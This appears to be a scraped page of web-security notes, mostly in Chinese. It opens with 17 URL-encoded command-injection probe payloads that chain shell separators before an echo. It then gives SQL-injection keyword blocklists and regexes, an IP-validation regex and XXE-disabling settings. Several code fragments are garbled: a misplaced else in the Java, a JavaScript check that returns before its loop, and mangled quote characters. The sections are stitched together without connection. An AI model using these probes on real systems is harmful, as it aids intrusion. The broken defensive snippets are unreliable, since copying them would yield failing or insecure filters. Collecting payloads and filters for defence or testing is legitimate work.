1 echo%20AGIYMZ$((69%2B52))$(echo%20AGIYMZ)AGIYMZ 2 %20echo%20TDJHRY$((30%2B41))$(echo%20TDJHRY)TDJHRY 3 ;echo%20MPCSBG$((54%2B42))$(echo%20MPCSBG)MPCSBG 4 &echo%20NWMZCF$((57%2B72))$(echo%20NWMZCF)NWMZCF 5 |echo%20TJEGSE$((27%2B57))$(echo%20TJEGSE)TJEGSE 6 ||echo%20ANSBHE$((26%2B89))$(echo%20ANSBHE)ANSBHE 7 &&echo%20PVJXOS$((12%2B1))$(echo%20PVJXOS)PVJXOS 8 %0aecho%20VVIEOJ$((30%2B78))$(echo%20VVIEOJ)VVIEOJ 9 %3Becho%20SRPJET$((29%2B34))$(echo%20SRPJET)SRPJET 10 %26echo%20NQPWBV$((16%2B77))$(echo%20NQPWBV)NQPWBV 11 %26%26echo%20QOZRFB$((19%2B4))$(echo%20QOZRFB)QOZRFB 12 %7Cecho%20IRODNG$((26%2B68))$(echo%20IRODNG)IRODNG 13 %7C%7Cecho%20KRCSNE$((57%2B75))$(echo%20KRCSNE)KRCSNE 14 echo%20IFNPXI$((40%2B99))$(echo%20IFNPXI)IFNPXI' 15 %20echo%20HBFEEM$((46%2B2))$(echo%20HBFEEM)HBFEEM' 16 ;echo%20KHMFRS$((69%2B67))$(echo%20KHMFRS)KHMFRS' 17 &echo%20DACXMN$((57%2B35))$(echo%20DACXMN)DACXMN'
SQL注入防護-4 - 使用正則校驗
.+ @"\s?sysobjects\s?|\s?xp_.*?|\s?syslogins\s?|\s?sysremote\s?|\s?sysusers\s?|\s?sysxlogins\s?|\s?sysdatabases\s?|\s?aspnet_.*?|\s?exec\s?", RegexOptions.Compiled | RegexOptions.IgnoreCase);
SQL注入防護-6 - 對字符串進行過濾
public static boolean sql_inj(String str){ String inj_str = "'|and|exec|insert|select|delete|update| count|*|%|chr|mid|master|truncate|char|declare|;|or|-|+|,"; String inj_stra[] = split(inj_str,"|"); for (int i=0 ; i < inj_stra.length ; i++ ){ if (str.indexOf(inj_stra[i])>=0){ return true; } }else{ return false; } JS中: function check(a){ return 1; fibdn = new Array (」‘」 ,」\\」,」/」); i=fibdn.length; j=a.length; for (ii=0; ii<i; ii++) { for (jj=0; jj<j; jj++) { temp1=a.charAt(jj); temp2=fibdn[ii]; if (tem’; p1==temp2) { return 0; } } } return 1; }
使用正則過濾IP字段 if(preg_match('/^(?=^.{3,255}$)[a-zA-Z0-9][-a-zA-Z0-9]{0,62}(\.[a-zA-Z0-9][-a-zA-Z0-9]{0,62})+$|^((25[0-5]|2[0-4]\d|[01]?\d\d?)($|(?!\.$)\.)){4}$/',$target)){}
使用開發語言提供的禁用外部實體的方法 PHP: libxml_disable_entity_loader(true); JAVA: DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance(); dbf.setExpandEntityReferences(false); Python: from lxml import etree xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False)) #過濾用戶提交的XML數據 過濾關鍵字:<\!DOCTYPE和<\!ENTITY,或者SYSTEM和PUBLIC。 不容許XML中含有本身定義的DTD
用Request.QueryString (GET) 或 Request.Form (POST)